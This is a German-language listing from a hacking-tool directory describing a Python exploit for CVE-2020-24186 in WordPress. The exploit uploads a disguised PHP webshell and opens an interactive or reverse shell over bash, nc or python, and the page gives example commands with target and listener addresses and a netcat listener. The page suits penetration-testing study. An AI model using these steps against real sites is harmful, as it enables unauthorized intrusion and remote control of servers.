Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/gazettel/cve-2020-24186
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Exploit-Skript für CVE-2020-24186 in WordPress, das eine getarnte PHP-Webshell hochlädt und interaktiven oder Reverse-Shell-Zugriff mit optionaler pwntools-Listener-Automatisierung bietet.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-24186

Dieses Skript nutzt die Schwachstelle CVE-2020-24186 in WordPress aus, um eine getarnte PHP-Nutzlast hochzuladen und eine Shell auf dem Zielsystem zu erhalten. Es gibt drei Betriebsmodi:

  1. Interaktive Shell:
    Lädt die Basis-Webshell hoch und wechselt in einen interaktiven Modus, in dem Sie Befehle über den Parameter cmd senden können.

  2. Manuelle Reverse Shell:
    Lädt die Webshell hoch und sendet die Reverse-Shell-Nutzlast, startet aber keinen automatischen Listener. Sie müssen Ihren eigenen Listener manuell auf der angegebenen IP und dem Port starten.

  3. Reverse Shell mit pwntools:
    Lädt die Webshell hoch, sendet die Reverse-Shell-Nutzlast, und das Skript startet automatisch einen Listener mit pwntools, um die Reverse-Verbindung zu empfangen.

Anforderungen

  • Python 3.x
  • Python-Bibliotheken:
    • requests
    • pwn (pwntools)
  • (Optional) Proxy-Konfiguration, wenn Sie den Datenverkehr umleiten möchten (z. B. für Tests mit Burp Suite).

Verwendungsoptionen

  • : Basis-URL der Zielwebsite (z. B. ).
--url
http://10.10.110.119
  • --blogpath: Pfad zum Beitrag (Standard: /?page=1).
  • --mode: Betriebsmodus, entweder interactive oder reverse.
  • --lhost: Lokale IP für die Reverse Shell (im Reverse-Modus erforderlich).
  • --lport: Lokaler Port für die Reverse Shell (im Reverse-Modus erforderlich).
  • --reverse_method: Reverse-Shell-Methode: bash, nc oder python (Standard ist bash).
  • --manual: Wenn im Reverse-Modus verwendet, startet das Skript keinen Listener; Sie müssen Ihren eigenen Listener manuell starten.
  • --use-proxy: Wenn gesetzt, werden Anfragen über den konfigurierten Proxy gesendet.
  • Beispiele

    1. Interaktive Shell

    Laden Sie eine Webshell hoch und starten Sie eine interaktive Sitzung, um Befehle zu senden:

    root@kitploit:~
    python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
    

    2. Reverse Shell im manuellen Modus

    Laden Sie die Webshell hoch, senden Sie die Reverse-Shell-Nutzlast, aber starten Sie keinen automatischen Listener. Starten Sie Ihren eigenen Listener manuell (z. B. mit netcat):

    root@kitploit:~
    python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
    

    Starten Sie dann in einem anderen Terminal Ihren Listener manuell:

    root@kitploit:~
    nc -lvnp 9002
    

    1. Reverse Shell mit pwntools

    Laden Sie die Webshell hoch, senden Sie die Reverse-Shell-Nutzlast, und lassen Sie das Skript automatisch einen Listener mit pwntools starten, um die Verbindung zu empfangen:

    root@kitploit:~
    python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
    

    Das Skript wartet auf eine Verbindung unter 10.10.1.1:9002 und stellt nach erfolgreicher Verbindung eine interaktive Shell bereit.

    Hinweise

    • Stellen Sie sicher, dass die Zielwebsite für CVE-2020-24186 anfällig ist und Sie über die erforderlichen Berechtigungen für Sicherheitstests verfügen.
    • Sie können die PHP-Nutzlast mit der Option --php_payload ändern, falls Anpassungen erforderlich sind.
    • Überprüfen Sie die Proxy-Einstellungen, wenn Sie das Flag --use-proxy verwenden.
    Tool herunterladen